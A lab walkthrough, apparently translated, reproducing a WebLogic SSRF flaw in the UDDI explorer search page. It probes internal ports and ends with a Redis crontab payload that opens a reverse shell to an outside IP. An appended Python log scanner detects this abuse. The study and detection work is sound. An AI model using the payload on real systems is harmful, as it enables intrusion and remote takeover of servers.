First, build the environment with Docker. Docker installation and environment setup tutorial: https://www.freebuf.com/sectool/252257.html
Access port 7001.
Second, reproduce the vulnerability.
1. The vulnerable page is /uddiexplorer/SearchPublicRegistries.jsp
2. Inspect the IBM entry.
It turns out to be a link, so there may be an SSRF.
3. Capture the request with Burp Suite and click Search.
4. Modify the link in the operator parameter.
5. Results: a request to a nonexistent port returns "could not connect over HTTP".
A request to an existing port returns a status code.
The difference between the two responses reveals whether a port is open.
Accessing the intranet
Payload for a reverse shell through Redis:
set 1 "* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1"
config set dir /etc/
config set dbfilename crontab
save
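Added example, not part of the original post: a log check that flags requests to the page above whose operator parameter points at an internal address, an unusual port, or carries strings from the Redis payload. It assumes the server's access log is in common log format with the query string recorded; the function names and the sample log lines are constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

VULN_PATH = "/uddiexplorer/searchpublicregistries.jsp"  # matched case-insensitively
# Substrings taken from the Redis payload shown on this page.
PAYLOAD_MARKERS = ("config set dir", "config set dbfilename", "/dev/tcp/")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines for illustration (not captured traffic).
SAMPLE_LOG = [
    '10.1.1.9 - - [04/Dec/2023:10:00:01 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://registry.example.com/inquiry&btnSubmit=Search HTTP/1.1" 200 9120',
    '10.1.1.9 - - [04/Dec/2023:10:00:07 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:7001&btnSubmit=Search HTTP/1.1" 200 9344',
    '10.1.1.9 - - [04/Dec/2023:10:00:09 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.0.0.5:6379/x%20config%20set%20dir%20/etc/&btnSubmit=Search HTTP/1.1" 200 9301',
    '10.1.1.9 - - [04/Dec/2023:10:00:12 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 3301',
]

def classify_operator(operator):
    """Return the reasons an operator value looks like SSRF abuse (empty if none)."""
    lowered = operator.lower()
    reasons = ["redis-payload"] if any(m in lowered for m in PAYLOAD_MARKERS) else []
    try:
        target = urlsplit(operator.strip())
        host, port = target.hostname, target.port  # .port raises on a junk port
    except ValueError:
        host = port = None
    if host is None:
        return reasons + ["malformed-url"]
    try:
        ip = ipaddress.ip_address(host)
        if ip.is_private or ip.is_loopback or ip.is_link_local:
            reasons.append("internal-address")
    except ValueError:
        pass  # a hostname, not an IP literal; resolve it separately if needed
    if port is not None and port not in (80, 443):
        reasons.append("unusual-port")
    return reasons

def scan(log_lines):
    """Yield (line_number, reasons) for suspicious requests to the UDDI search page."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if url.path.lower() != VULN_PATH:
            continue
        for operator in parse_qs(url.query).get("operator", []):
            reasons = classify_operator(operator)
            if reasons:
                yield number, reasons
```

If the search form is submitted as a POST, the operator value is in the request body and this check has to run where bodies are visible, for example at a reverse proxy or WAF.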
2023-12-04